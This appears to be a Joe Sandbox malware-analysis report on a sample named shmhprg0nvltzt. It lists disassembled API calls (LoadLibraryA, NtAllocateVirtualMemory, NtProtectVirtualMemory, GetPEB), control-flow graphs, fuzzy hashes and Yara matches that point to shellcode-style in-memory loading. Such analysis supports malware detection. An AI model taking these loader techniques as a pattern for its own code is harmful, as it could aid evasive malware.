                                                                                                                                                                                                                                  • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,0042C248,00000000,?,?,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,?,?,00406672,80000002), ref: 00406451
                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,C:\Users\user\AppData\Local\Temp\Stuffiness7.dat,00000000,0042C248), ref: 0040645C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\Stuffiness7.dat, xrefs: 00406412
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\Stuffiness7.dat
                                                                                                                                                                                                                                • API String ID: 3356406503-1966830035
                                                                                                                                                                                                                                • Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,76F73420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                                                                                • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenW.KERNEL32(80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00405E5E
                                                                                                                                                                                                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Program Files (x86)\E6l40hhe,004030E9,C:\Program Files (x86)\E6l40hhe,C:\Program Files (x86)\E6l40hhe,00443800,00443800,80000000,00000003), ref: 00405E6E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                • C:\Program Files (x86)\E6l40hhe, xrefs: 00405E58
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                                                                                • String ID: C:\Program Files (x86)\E6l40hhe
                                                                                                                                                                                                                                • API String ID: 2709904686-3393615557
                                                                                                                                                                                                                                • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction ID: d2786f61c86b799b8b6ecf14661ff9643eaf9d362a95097130d0805b1e4d2bc4
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36D0A7B3410D20DAC3126718DC04DAF73ECFF6134074A442AF481A71A4D7785E8186ED
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                                                                                                                                                                • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000022.00000002.4619677659.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_34_2_400000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 0 166f637-166f7d8 call 166d5d9 * 2 call 16712d1 GetPEB call 167053d 13 166f7de-166f860 call 166f7f1 0->13 14 166ff68-166ff6b 0->14 19 166f866-166f87c 13->19 20 167125b-167125f 13->20 21 1661407-1661419 call 16611c1 19->21 22 166f882-166f8b1 19->22 23 1671260-16712c6 20->23 30 166cd15-166ce9a call 166d535 21->30 31 16613a3-16613c2 21->31 22->21 25 166f8b7-166fa3f 22->25 29 16712c8-16712ca 23->29 37 166fa43-166fa50 25->37 80 166ce9c-166cf73 30->80 31->21 39 166fa56-166fa62 37->39 40 166ff6e-166ff80 37->40 43 1668d15-1668d3a 39->43 44 166fa68-166fa8b 39->44 41 166ff84-166ff91 40->41 47 166ff97-166ffa7 41->47 48 16702c5-16702d2 41->48 45 1668d40-1669291 call 166f637 call 166d5ba call 1670b0b 43->45 46 166d5d9-166d686 43->46 44->37 50 166fa8d-166fa9f 44->50 169 1669297-1669382 call 166d5d9 call 1670b0b call 166a367 45->169 170 166a23c-166a361 call 1670b0b * 3 45->170 57 166d73f-166d742 LoadLibraryA call 166d753 46->57 58 166d68c-166d73d call 166d6ae call 166de34 call 166d753 46->58 47->41 52 166ffa9-167001b 47->52 53 16702d6-1670316 48->53 50->37 55 166faa1-166fab2 50->55 52->43 67 1670021-167002b 52->67 68 1670502-1670534 call 167053d 53->68 69 167031c-1670354 53->69 55->37 63 166fab4-166faf8 55->63 79 166d747-166d74f 57->79 58->57 72 166fafe-166fb25 63->72 73 166146b-166c450 call 16606c3 63->73 67->41 77 1670031-1670062 67->77 68->20 69->53 78 1670356-1670386 69->78 81 166fb27-166fb81 72->81 104 166c452 73->104 105 166c463-166c491 73->105 77->41 85 1670068-16700d0 77->85 78->53 86 167038c-16703ea 78->86 113 166cf79-166cfcc 80->113 97 166fb83-166fbad 81->97 98 166fbaf-166fbeb 81->98 101 16700d2-16700e4 85->101 86->53 102 16703f0-1670416 86->102 106 166fc11-166fc67 97->106 98->106 117 166fbed-166fc10 98->117 110 1670220-1670293 
101->110 111 16700ea-1670101 101->111 112 167041b-167046c 102->112 114 166c494-166c573 call 1660538 104->114 105->114 106->46 130 166fc6d-166fc8a 106->130 110->101 127 1670299-16702c2 call 167053d 110->127 121 1670107-16701ad 111->121 122 16701af-1670205 111->122 124 167046e-167048b 112->124 125 167048c-16704fc 112->125 113->21 126 166cfd2-166d077 113->126 157 166c59d-166c5a7 114->157 117->106 121->122 149 1670207-167021f 121->149 122->110 124->125 125->68 125->112 138 166fe04-166fe14 130->138 139 166fc90-166fcbe 130->139 144 166fe1a-166fe31 138->144 145 166fea9-166feba 138->145 139->138 147 166fcc4-166fd42 139->147 144->145 150 166fe33-166fea6 144->150 145->43 151 166fec0-166fee8 145->151 158 166fd44-166fd56 147->158 149->110 150->145 151->81 156 166feee-166ff51 151->156 156->21 166 166ff57-166ff66 call 167053d 156->166 157->46 162 166c5ad-166c5fd call 166abe1 157->162 158->158 163 166fd58-166fd6e 158->163 182 166c587-166c59c 162->182 183 166c5ff-166c634 162->183 163->158 164 166fd70-166fdee 163->164 164->46 174 166fdf4-166fdfd 164->174 166->14 169->21 199 1669388-1669726 call 166d535 call 1670b0b 169->199 170->46 174->158 179 166fe03 174->179 179->138 182->157 186 166c635-166c653 call 166a594 183->186 198 166c655-166c65f 186->198 198->46 199->170 212 166972c-16698c0 199->212 212->46 216 16698c6-1669907 call 1670b0b 212->216 216->170 219 166990d-1669bae call 1670b0b 216->219 219->170 226 1669bb4-1669c0e 219->226 226->43 228 1669c14-1669c29 226->228 228->170 229 1669c2f-1669c60 228->229 230 1669cc5-1669cd7 229->230 231 1669c62-1669cbf 229->231 230->43 233 1669cdd-1669cea 230->233 231->170 231->230 233->170 234 1669cf0-1669e60 233->234 234->46 237 1669e66-1669ee0 call 166db48 234->237 237->170 241 1669ee6-1669fbd call 167125b 237->241 241->170 246 1669fc3-166a0cb call 1670b0b 241->246 246->170 251 166a0d1-166a175 call 1670b0b 246->251 251->170 255 166a17b-166a23b call 1670b0b 251->255 255->46
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ?~6$`\5z$dX.F$C
                                                                                                                                                                                                                                • API String ID: 3389902171-2019787811
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 260 1668602-1668677 GetPEB 262 166867d-16686b0 260->262 263 166887a-166887d 260->263 264 16686b6-166873b 262->264 266 1668741-16687e5 264->266 267 16687ec-1668819 264->267 276 1668d15-1668d3a 266->276 277 16687eb 266->277 269 166881f-1668828 267->269 270 166d5d9-166d686 267->270 269->264 272 166882e-1668878 269->272 274 166d73f-166d74f LoadLibraryA call 166d753 270->274 275 166d68c-166d73d call 166d6ae call 166de34 call 166d753 270->275 272->263 275->274 276->270 280 1668d40-1669291 call 166f637 call 166d5ba call 1670b0b 276->280 277->267 306 1669297-1669382 call 166d5d9 call 1670b0b call 166a367 280->306 307 166a23c-166a361 call 1670b0b * 3 280->307 322 1661407-1661419 call 16611c1 306->322 323 1669388-1669726 call 166d535 call 1670b0b 306->323 307->270 330 166cd15-166ce9a call 166d535 322->330 331 16613a3-16613c2 322->331 323->307 348 166972c-16698c0 323->348 351 166ce9c-166cf73 330->351 331->322 348->270 356 16698c6-1669907 call 1670b0b 348->356 359 166cf79-166cfcc 351->359 356->307 363 166990d-1669bae call 1670b0b 356->363 359->322 362 166cfd2-166d077 359->362 363->307 372 1669bb4-1669c0e 363->372 372->276 374 1669c14-1669c29 372->374 374->307 375 1669c2f-1669c60 374->375 376 1669cc5-1669cd7 375->376 377 1669c62-1669cbf 375->377 376->276 379 1669cdd-1669cea 376->379 377->307 377->376 379->307 380 1669cf0-1669e60 379->380 380->270 383 1669e66-1669ee0 call 166db48 380->383 383->307 387 1669ee6-1669fbd call 167125b 383->387 387->307 392 1669fc3-166a0cb call 1670b0b 387->392 392->307 397 166a0d1-166a175 call 1670b0b 392->397 397->307 401 166a17b-166a23b call 1670b0b 397->401 401->270
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: )IpI$dX.F$C
                                                                                                                                                                                                                                • API String ID: 0-3008493083
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 406 166accc-166acdb 407 166af87-166b00b 406->407 408 166ace1-166af2e call 166d5d9 406->408 412 166b011-166b12b call 166d553 call 166b025 407->412 413 167125b-167125f 407->413 426 166af34-166af84 NtAllocateVirtualMemory 408->426 427 166146b-166c450 call 16606c3 408->427 431 166b12c-166b133 412->431 415 1671260-16712c6 413->415 421 16712c8-16712ca 415->421 426->407 434 166c452 427->434 435 166c463-166c491 427->435 431->431 433 166b135-166b142 431->433 436 166b144-166b17f 433->436 437 166b1a3-166b1a8 433->437 438 166c494-166c573 call 1660538 434->438 435->438 439 166b1a9-166b1e8 436->439 437->439 445 166c59d-166c5a7 438->445 439->413 446 166c5ad-166c5fd call 166abe1 445->446 447 166d5d9-166d686 445->447 459 166c587-166c59c 446->459 460 166c5ff-166c634 446->460 450 166d73f-166d742 LoadLibraryA call 166d753 447->450 451 166d68c-166d73d call 166d6ae call 166de34 call 166d753 447->451 458 166d747-166d74f 450->458 451->450 459->445 462 166c635-166c653 call 166a594 460->462 470 166c655-166c65f 462->470 470->447
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 0166D5D9: LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                • NtAllocateVirtualMemory.NTDLL(-0000000173D1F5F2,?,-6BB0B5A4), ref: 0166AF61
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocateLibraryLoadMemoryVirtual
                                                                                                                                                                                                                                • String ID: #4o$M{O$d5z7
                                                                                                                                                                                                                                • API String ID: 2616484454-573927798
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 472 166f2c1-166f2da GetPEB 473 166f2dd-166f341 472->473 475 166f344-166f3a1 473->475 475->473 477 166f3a7-166f3aa 475->477 477->475 478 166f3ac-166f3b0 477->478 478->475 479 166f3b2-166f424 478->479 481 1661407-1661419 call 16611c1 479->481 482 166f42a-166f5b5 call 167125b NtProtectVirtualMemory 479->482 488 166cd15-166ce9a call 166d535 481->488 489 16613a3-16613c2 481->489 492 166f5e3-166f5fb 482->492 502 166ce9c-166cf73 488->502 489->481 492->481 495 166f601-166f622 492->495 506 166cf79-166cfcc 502->506 506->481 508 166cfd2-166d077 506->508
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(21E1D45A,?,?,-2938D17D,?,7D6D90FF,7D6D90FF,?,?), ref: 0166F5AB
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MemoryProtectVirtual
                                                                                                                                                                                                                                • String ID: ;
                                                                                                                                                                                                                                • API String ID: 2706961497-1661535913
                                                                                                                                                                                                                                • Opcode ID: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction ID: a9d8fbdee777da4abe03e6c250b927323ea38e36efe8309a159abe9d031dcd73
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ded3fc8bedde250aa3a6439810dc9cebc30258fe9e748f19020c41f2a960c275
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7451ECB16042458FEF34CE29DC90BDA37B6EF99354F59812ECC499B306C3359A868B01
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                • NtProtectVirtualMemory.NTDLL(2348C063,?,?,?,?,0166F76E,166B4E76,01668F2E), ref: 0167064F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1660000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoadMemoryProtectVirtual
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3389902171-0
                                                                                                                                                                                                                                • Opcode ID: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction ID: 1dc4855b51176ddc4ec5e04a386a035a8d67e32e7f2e3d08f13c9903f6ad32d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0660e06764b7d2fb85da728abd28d7a6242afb5d65331fca36c53874cff23d3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C631F47174128A9FCF30DEA98C947EA77EAAFA4610F94412AEC4DCB300D7309A41CB11
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
• Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: ae41cd1c9676f55621ed04fc49dd8e482cc7fea15bc7ae6a6e8924cd6bea503d
                                                                                                                                                                                                                                • Instruction ID: 63f2ef8f4e1d42c4f1f15893806582d730692260d7851948cc15afd50a8ee536
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae41cd1c9676f55621ed04fc49dd8e482cc7fea15bc7ae6a6e8924cd6bea503d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4390023120500813D611A158464474B108A47D0241FD2C816B0424918DD6A68953B125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
• Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 5d42ab61ff93aad12668fc9d045a9a6e7d9ed90b2987fedf2412f58d33ea8901
                                                                                                                                                                                                                                • Instruction ID: 11640b75884037c498d3f6a3a1f203e3771246fed04d35741aa3d7ab413bb5cd
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5d42ab61ff93aad12668fc9d045a9a6e7d9ed90b2987fedf2412f58d33ea8901
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7490027120500803D640B158454478A108647D0301F92C415B5064914EC6A98DD67669
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
• Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: 32101076fbff62721e54ce2912dcf65b02c7f384b48ce69baeb41e9c24983095
                                                                                                                                                                                                                                • Instruction ID: cdc9add453980368c5147b2e6dc9be4cf8e15c523328bf781af9600bc3150687
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 32101076fbff62721e54ce2912dcf65b02c7f384b48ce69baeb41e9c24983095
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2B90023120500C03D680B158454468E108647D1301FD2C419B0025A14DCA658A5A77A5
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
• Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: a7fc328138e0b1123c3d6f1a3919cfba0d7e536cf480ef0b850c244d01f63c3d
                                                                                                                                                                                                                                • Instruction ID: 6b368b6176604c485db0d328d0cc847c0d3050c5b188e96a4887f57462294381
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a7fc328138e0b1123c3d6f1a3919cfba0d7e536cf480ef0b850c244d01f63c3d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE90023120508C03D610A158854478E108647D0301F96C815B4424A18DC6E588927125
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, Offset: 1F190000, based on PE: true
• Associated: 00000023.00000002.4845349706.000000001F2B9000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_35_2_1f190000_shmhprg0nvltzt.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                • Opcode ID: b4350c89dfb695415b713690bfcf36963c76ca9848db68abb5827d799d267069
                                                                                                                                                                                                                                • Instruction ID: 5e47571e78d2eaf800f2b3c614a58329666e8fbfe267416fe43f598e3b4e2798
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4350c89dfb695415b713690bfcf36963c76ca9848db68abb5827d799d267069
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7790023160910803D600A158465474A208647D0201FA2C815B0424928DC7E5895275A6
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(B2B1C27B,E6BEB875), ref: 0166D73F
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000023.00000002.4818276566.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
